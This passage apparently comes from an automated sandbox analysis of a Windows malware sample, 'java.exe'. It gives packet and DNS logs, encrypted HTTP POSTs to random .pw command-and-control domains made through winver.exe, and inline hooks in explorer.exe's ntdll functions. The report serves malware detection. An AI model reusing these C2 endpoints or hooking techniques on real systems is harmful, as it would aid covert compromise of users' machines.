                                                                                                                                                                        Dec 19, 2023 00:41:25.475245953 CET44349730173.222.162.32192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:25.475312948 CET49730443192.168.2.4173.222.162.32
                                                                                                                                                                        Dec 19, 2023 00:41:25.475419998 CET49730443192.168.2.4173.222.162.32
                                                                                                                                                                        Dec 19, 2023 00:41:25.475438118 CET44349730173.222.162.32192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:25.475449085 CET49730443192.168.2.4173.222.162.32
                                                                                                                                                                        Dec 19, 2023 00:41:25.475481033 CET49730443192.168.2.4173.222.162.32
                                                                                                                                                                        Dec 19, 2023 00:41:27.714906931 CET49672443192.168.2.4173.222.162.32
                                                                                                                                                                        Dec 19, 2023 00:41:32.527401924 CET49672443192.168.2.4173.222.162.32
                                                                                                                                                                        Dec 19, 2023 00:41:33.342890024 CET4973580192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:41:33.544368982 CET8049735216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:33.544491053 CET4973580192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:41:33.880542994 CET4973580192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:41:34.081960917 CET8049735216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:34.082025051 CET4973580192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:41:34.283010960 CET8049735216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:34.283396959 CET8049735216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:34.283459902 CET8049735216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:34.283638000 CET4973580192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:41:38.616506100 CET4973580192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:41:38.817711115 CET8049735216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:42.136801958 CET49672443192.168.2.4173.222.162.32
                                                                                                                                                                        Dec 19, 2023 00:41:44.458991051 CET4973680192.168.2.4104.131.68.180
                                                                                                                                                                        Dec 19, 2023 00:41:44.626821041 CET8049736104.131.68.180192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:44.626909971 CET4973680192.168.2.4104.131.68.180
                                                                                                                                                                        Dec 19, 2023 00:41:44.628602982 CET4973680192.168.2.4104.131.68.180
                                                                                                                                                                        Dec 19, 2023 00:41:44.795018911 CET8049736104.131.68.180192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:44.795100927 CET4973680192.168.2.4104.131.68.180
                                                                                                                                                                        Dec 19, 2023 00:41:44.961527109 CET8049736104.131.68.180192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:44.968421936 CET8049736104.131.68.180192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:44.968435049 CET8049736104.131.68.180192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:44.968966961 CET4973680192.168.2.4104.131.68.180
                                                                                                                                                                        Dec 19, 2023 00:41:44.968966961 CET4973680192.168.2.4104.131.68.180
                                                                                                                                                                        Dec 19, 2023 00:41:45.135353088 CET8049736104.131.68.180192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:45.918627024 CET4973780192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:41:46.120387077 CET8049737216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:46.120497942 CET4973780192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:41:46.120626926 CET4973780192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:41:46.322284937 CET8049737216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:46.322359085 CET4973780192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:41:46.523906946 CET8049737216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:46.524444103 CET8049737216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:46.524456024 CET8049737216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:46.524658918 CET4973780192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:41:46.524930954 CET4973780192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:41:46.726591110 CET8049737216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:47.465358973 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:41:47.666697979 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:47.666779041 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:41:47.666889906 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:41:47.867882967 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:47.867964983 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:41:48.069252014 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:48.071468115 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:48.071528912 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:48.071772099 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:41:53.135473013 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:53.183711052 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:41:59.167958021 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:59.214984894 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:42:05.148691893 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:42:05.199353933 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:42:11.177659988 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:42:11.230655909 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:42:17.132055044 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:42:17.183778048 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:42:23.131304979 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:42:23.183748960 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:42:29.123557091 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:42:29.168138027 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:42:35.163013935 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:42:35.215015888 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:42:41.203771114 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:42:41.246270895 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:42:47.200882912 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:42:47.246324062 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:42:53.165776014 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:42:53.215081930 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:42:59.133546114 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:42:59.183963060 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:43:05.150171041 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:43:05.199718952 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:43:11.185828924 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:43:11.230670929 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:43:17.137090921 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:43:17.183808088 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:43:23.129139900 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:43:23.183823109 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                                        Dec 19, 2023 00:43:29.205451012 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:43:29.246298075 CET4973880192.168.2.4216.218.185.162

                                                                                                                                                                        UDP Packets

                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Dec 19, 2023 00:41:10.802402020 CET6270953192.168.2.41.1.1.1
                                                                                                                                                                        Dec 19, 2023 00:41:11.373840094 CET53627091.1.1.1192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:38.617091894 CET6127853192.168.2.41.1.1.1
                                                                                                                                                                        Dec 19, 2023 00:41:39.146748066 CET53612781.1.1.1192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:44.969724894 CET5487453192.168.2.41.1.1.1
                                                                                                                                                                        Dec 19, 2023 00:41:45.555104971 CET53548741.1.1.1192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:46.525633097 CET5806853192.168.2.41.1.1.1
                                                                                                                                                                        Dec 19, 2023 00:41:47.101788998 CET53580681.1.1.1192.168.2.4

                                                                                                                                                                        DNS Queries

                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                        Dec 19, 2023 00:41:10.802402020 CET192.168.2.41.1.1.10x9459Standard query (0)spaines.pwA (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 19, 2023 00:41:38.617091894 CET192.168.2.41.1.1.10xc3aeStandard query (0)uyhgqunqkxnx.pwA (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 19, 2023 00:41:44.969724894 CET192.168.2.41.1.1.10x2e03Standard query (0)vcklmnnejwxx.pwA (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 19, 2023 00:41:46.525633097 CET192.168.2.41.1.1.10xe6b7Standard query (0)cmnsgscccrej.pwA (IP address)IN (0x0001)false

                                                                                                                                                                        DNS Answers

                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                        Dec 19, 2023 00:41:11.373840094 CET1.1.1.1192.168.2.40x9459No error (0)spaines.pw216.218.185.162A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 19, 2023 00:41:39.146748066 CET1.1.1.1192.168.2.40xc3aeNo error (0)uyhgqunqkxnx.pw104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 19, 2023 00:41:39.146748066 CET1.1.1.1192.168.2.40xc3aeNo error (0)uyhgqunqkxnx.pw45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 19, 2023 00:41:39.146748066 CET1.1.1.1192.168.2.40xc3aeNo error (0)uyhgqunqkxnx.pw178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 19, 2023 00:41:45.555104971 CET1.1.1.1192.168.2.40x2e03No error (0)vcklmnnejwxx.pw216.218.185.162A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 19, 2023 00:41:47.101788998 CET1.1.1.1192.168.2.40xe6b7No error (0)cmnsgscccrej.pw216.218.185.162A (IP address)IN (0x0001)false

                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                        • https:
                                                                                                                                                                          • www.bing.com
                                                                                                                                                                        • spaines.pw
                                                                                                                                                                        • uyhgqunqkxnx.pw
                                                                                                                                                                        • vcklmnnejwxx.pw
                                                                                                                                                                        • cmnsgscccrej.pw

                                                                                                                                                                        HTTP Packets

                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        0192.168.2.449735216.218.185.162806384C:\Windows\SysWOW64\winver.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2023 00:41:33.880542994 CET93OUTPOST /EiDQjNbWEQ/ HTTP/1.0
                                                                                                                                                                        Host: spaines.pw
                                                                                                                                                                        Content-Length: 157
                                                                                                                                                                        Data Raw: 17 df be d8 01 d5 be d8 79 91 65 5a 11 dd bf fb 27 ef 8e e8 27 ef 8e e8
                                                                                                                                                                        Data Ascii: yeZ''
                                                                                                                                                                        Dec 19, 2023 00:41:34.082025051 CET133OUTData Raw: 00 80 00 00 00 77 ee f1 1d 7b 26 be ec 1a 51 ba f1 d2 a4 d3 f7 e9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 81 ae 9b 1e d7 58 12 93 3e 77 77 7a 3e 5e 7c 99 17 7c 25 a4 ee b2 87 0f bd d3 27 4d f0 4b 6a bb 2d cc 2c a2 7c bd b4 b1 79 e8 c4 ab 1b
                                                                                                                                                                        Data Ascii: w{&QYg6u#aX>wwz>^||%'MKj-,|yVB}{)g4fo=hjD9xTq}U
                                                                                                                                                                        Dec 19, 2023 00:41:34.283396959 CET156INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx/1.21.6
                                                                                                                                                                        Date: Mon, 18 Dec 2023 23:41:34 GMT
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                        Connection: close


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        1192.168.2.449736104.131.68.180806384C:\Windows\SysWOW64\winver.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2023 00:41:44.628602982 CET98OUTPOST /EiDQjNbWEQ/ HTTP/1.0
                                                                                                                                                                        Host: uyhgqunqkxnx.pw
                                                                                                                                                                        Content-Length: 157
                                                                                                                                                                        Data Raw: df a3 ff f3 c4 a9 ff f3 b1 ed 24 71 d9 a1 fe d0 ef 93 cf c3 ef 93 cf c3
                                                                                                                                                                        Data Ascii: $q
                                                                                                                                                                        Dec 19, 2023 00:41:44.795100927 CET133OUTData Raw: 00 80 00 00 00 71 e7 f8 13 64 36 a3 b3 01 5e d4 89 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c ab 0f 10 a5 5e f7 48 66 e0 38 ff 29 d4 34 f7 00 b5 6d d4 70 17 e0 8f 1c 9e 5c 26 5a 00 b5 8a c4 07 42 79 f5 69 4d 2d 1a af eb d0 03 bf
                                                                                                                                                                        Data Ascii: qd6^Yg6u#a^Hf8)4mp\&ZByiM-,%^'UVRwMeDc3SE'E=5;*vM]
                                                                                                                                                                        Dec 19, 2023 00:41:44.968421936 CET75INHTTP/1.0 200 OK
                                                                                                                                                                        Date: Mon, 18 Dec 2023 23:41:44 GMT
                                                                                                                                                                        Content-Length: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        2192.168.2.449737216.218.185.162806384C:\Windows\SysWOW64\winver.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2023 00:41:46.120626926 CET98OUTPOST /EiDQjNbWEQ/ HTTP/1.0
                                                                                                                                                                        Host: vcklmnnejwxx.pw
                                                                                                                                                                        Content-Length: 157
                                                                                                                                                                        Data Raw: 44 9d 81 a8 58 97 81 a8 2a d3 5a 2a 42 9f 80 8b 74 ad b1 98 74 ad b1 98
                                                                                                                                                                        Data Ascii: DX*Z*Btt
                                                                                                                                                                        Dec 19, 2023 00:41:46.322359085 CET133OUTData Raw: 00 80 00 00 00 72 fd fb 18 78 2d a3 a7 00 51 c2 89 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c ce 3a cf 56 b7 df cf c4 81 1e 9f b8 bc c8 39 5e 41 f6 86 66 89 07 a1 d0 90 0f d4 8e 21 23 51 7c f5 01 fd 6f 8b 2e d4 7c c2 45 1b 69 8a
                                                                                                                                                                        Data Ascii: rx-QYg6u#a:V9^Af!#Q|o.|Eik,09^Yj"c(<<0?z6Y`*3
                                                                                                                                                                        Dec 19, 2023 00:41:46.524444103 CET156INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx/1.21.6
                                                                                                                                                                        Date: Mon, 18 Dec 2023 23:41:46 GMT
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                        Connection: close


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        3192.168.2.449738216.218.185.162806384C:\Windows\SysWOW64\winver.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2023 00:41:47.666889906 CET98OUTPOST /EiDQjNbWEQ/ HTTP/1.0
                                                                                                                                                                        Host: cmnsgscccrej.pw
                                                                                                                                                                        Content-Length: 157
                                                                                                                                                                        Data Raw: 38 28 9d 64 25 22 9d 64 56 66 46 e6 3e 2a 9c 47 08 18 ad 54 08 18 ad 54
                                                                                                                                                                        Data Ascii: 8(d%"dVfF>*GTT
                                                                                                                                                                        Dec 19, 2023 00:41:47.867964983 CET133OUTData Raw: 00 80 00 00 00 67 f3 fe 07 72 30 ae a1 09 54 df 9b fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c d7 66 d3 12 68 bf 2b 87 28 f7 bb f4 88 8c 42 12 a7 7b aa 22 89 aa bc 94 a8 3b 30 d2 df a8 75 20 4d ea 86 2b 61 c1 f8 38 cf b8 06 25 65
                                                                                                                                                                        Data Ascii: gr0TYg6u#afh+(B{";0u M+a8%e/&*t2hd{l(8[u]\El|[%W
                                                                                                                                                                        Dec 19, 2023 00:41:48.071468115 CET137INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx/1.21.6
                                                                                                                                                                        Date: Mon, 18 Dec 2023 23:41:47 GMT
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Dec 19, 2023 00:41:48.071528912 CET1INData Raw: 58
                                                                                                                                                                        Data Ascii: X
                                                                                                                                                                        Dec 19, 2023 00:41:53.135473013 CET1INData Raw: 65
                                                                                                                                                                        Data Ascii: e
                                                                                                                                                                        Dec 19, 2023 00:41:59.167958021 CET1INData Raw: 65
                                                                                                                                                                        Data Ascii: e
                                                                                                                                                                        Dec 19, 2023 00:42:05.148691893 CET1INData Raw: 55
                                                                                                                                                                        Data Ascii: U
                                                                                                                                                                        Dec 19, 2023 00:42:11.177659988 CET1INData Raw: 46
                                                                                                                                                                        Data Ascii: F
                                                                                                                                                                        Dec 19, 2023 00:42:17.132055044 CET1INData Raw: 71
                                                                                                                                                                        Data Ascii: q
                                                                                                                                                                        Dec 19, 2023 00:42:23.131304979 CET1INData Raw: 54
                                                                                                                                                                        Data Ascii: T
                                                                                                                                                                        Dec 19, 2023 00:42:29.123557091 CET1INData Raw: 55
                                                                                                                                                                        Data Ascii: U
                                                                                                                                                                        Dec 19, 2023 00:42:35.163013935 CET1INData Raw: 6f
                                                                                                                                                                        Data Ascii: o


                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        0192.168.2.449730173.222.162.324434984C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2023-12-18 23:41:25 UTC2301OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                                                                                                                        Origin: https://www.bing.com
                                                                                                                                                                        Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Accept-Language: en-CH
                                                                                                                                                                        Content-type: text/xml
                                                                                                                                                                        X-Agent-DeviceId: 01000A4109000CC6
                                                                                                                                                                        X-BM-CBT: 1696420817
                                                                                                                                                                        X-BM-DateFormat: dd/MM/yyyy
                                                                                                                                                                        X-BM-DeviceDimensions: 784x984
                                                                                                                                                                        X-BM-DeviceDimensionsLogical: 784x984
                                                                                                                                                                        X-BM-DeviceScale: 100
                                                                                                                                                                        X-BM-DTZ: 60
                                                                                                                                                                        X-BM-Market: CH
                                                                                                                                                                        X-BM-Theme: 000000;0078d7
                                                                                                                                                                        X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                                                                                                                                        X-Device-ClientSession: 0912CF9094994CFA88DE52C6FB19D4E1
                                                                                                                                                                        X-Device-isOptin: false
                                                                                                                                                                        X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                                                                                        X-Device-OSSKU: 48
                                                                                                                                                                        X-Device-Touch: false
                                                                                                                                                                        X-DeviceID: 01000A4109000CC6
                                                                                                                                                                        X-MSEdge-ExternalExp: bfbwsbrs0830tf,d-thshldspcl40,msbdsborgv2co,msbwdsbi920t1,spofglclicksh-c2,webtophit0r_t,wsbmsaqfuxtc,wsbqfasmsall_t,wsbqfminiserp400,wsbref-t
                                                                                                                                                                        X-MSEdge-ExternalExpType: JointCoord
                                                                                                                                                                        X-PositionerType: Desktop
                                                                                                                                                                        X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                                                                                        X-Search-CortanaAvailableCapabilities: None
                                                                                                                                                                        X-Search-SafeSearch: Moderate
                                                                                                                                                                        X-Search-TimeZone: Bias=0; DaylightBias=-60; TimeZoneKeyName=GMT Standard Time
                                                                                                                                                                        X-UserAgeClass: Unknown
                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                        Host: www.bing.com
                                                                                                                                                                        Content-Length: 2232
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Cookie: MUID=6666694284484FA1B35CCB433D42E997; _SS=SID=193A581F83766B4319784BBF829B6A16&CPID=1696420820117&AC=1&CPH=e5c79613&CBV=39942242; _EDGE_S=SID=193A581F83766B4319784BBF829B6A16; SRCHUID=V=2&GUID=BA43D82178364AEA9C1EE6C32BE93416&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231003; SRCHHPGUSR=SRCHLANG=en&LUT=1696420817741&IPMH=425591ef&IPMID=1696420817913&HV=1696417346; ANON=A=6D8F9DF00282E660E425530EFFFFFFFF; CortanaAppUID=4C9C2B2D0465FD7A42C74C7E93CFB630; MUIDB=6666694284484FA1B35CCB433D42E997
                                                                                                                                                                        2023-12-18 23:41:25 UTC2232OUTData Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 36 36 36 36 36 39 34 32 38 34 34 38 34 46 41 31 42 33 35 43 43 42 34 33 33 44 34 32 45 39 39 37 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 38 39 32 46 41 30 37 38 38 36 34 31 34 42 44 46 38 45 45 31 37 36 34 41 35 39 46 46 33 39 43 36 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43
                                                                                                                                                                        Data Ascii: <ClientInstRequest><CID>6666694284484FA1B35CCB433D42E997</CID><Events><E><T>Event.ClientInst</T><IG>892FA07886414BDF8EE1764A59FF39C6</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"C
                                                                                                                                                                        2023-12-18 23:41:25 UTC476INHTTP/1.1 204 No Content
                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                        X-MSEdge-Ref: Ref A: 3E58B4D29D4146169BADA8B6E4FA0F6B Ref B: BY3EDGE0305 Ref C: 2023-12-18T23:41:25Z
                                                                                                                                                                        Date: Mon, 18 Dec 2023 23:41:25 GMT
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Alt-Svc: h3=":443"; ma=93600
                                                                                                                                                                        X-CDN-TraceID: 0.20a6dc17.1702942885.1ccaa844


                                                                                                                                                                        Code Manipulations

                                                                                                                                                                        User Modules

                                                                                                                                                                        Hook Summary

                                                                                                                                                                        Function NameHook TypeActive in Processes
                                                                                                                                                                        ZwResumeThreadINLINEexplorer.exe
                                                                                                                                                                        NtQueryDirectoryFileINLINEexplorer.exe
                                                                                                                                                                        ZwEnumerateValueKeyINLINEexplorer.exe
                                                                                                                                                                        NtResumeThreadINLINEexplorer.exe
                                                                                                                                                                        ZwCreateUserProcessINLINEexplorer.exe
                                                                                                                                                                        NtEnumerateValueKeyINLINEexplorer.exe
                                                                                                                                                                        NtCreateUserProcessINLINEexplorer.exe
                                                                                                                                                                        ZwQueryDirectoryFileINLINEexplorer.exe

                                                                                                                                                                        Processes

                                                                                                                                                                        Process: explorer.exe, Module: ntdll.dll
                                                                                                                                                                        Function NameHook TypeNew Data
                                                                                                                                                                        ZwResumeThreadINLINE0xE9 0x9E 0xE1 0x12 0x25 0x51
                                                                                                                                                                        NtQueryDirectoryFileINLINE0xE9 0x98 0x81 0x12 0x29 0x91
                                                                                                                                                                        ZwEnumerateValueKeyINLINE0xE9 0x9C 0xC1 0x12 0x2D 0xD1
                                                                                                                                                                        NtResumeThreadINLINE0xE9 0x9E 0xE1 0x12 0x25 0x51
                                                                                                                                                                        ZwCreateUserProcessINLINE0xE9 0x93 0x31 0x11 0x17 0x71
                                                                                                                                                                        NtEnumerateValueKeyINLINE0xE9 0x9C 0xC1 0x12 0x2D 0xD1
                                                                                                                                                                        NtCreateUserProcessINLINE0xE9 0x93 0x31 0x11 0x17 0x71
                                                                                                                                                                        ZwQueryDirectoryFileINLINE0xE9 0x98 0x81 0x12 0x29 0x91

                                                                                                                                                                        Statistics

                                                                                                                                                                        CPU Usage

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Memory Usage

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                        Behavior

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        System Behavior

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:0
                                                                                                                                                                        Start time:00:41:03
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Users\user\Desktop\java.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Users\user\Desktop\java.exe
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:116'224 bytes
                                                                                                                                                                        MD5 hash:0411C0706F66B49AA6BEF1528606EE31
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:1
                                                                                                                                                                        Start time:00:41:03
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

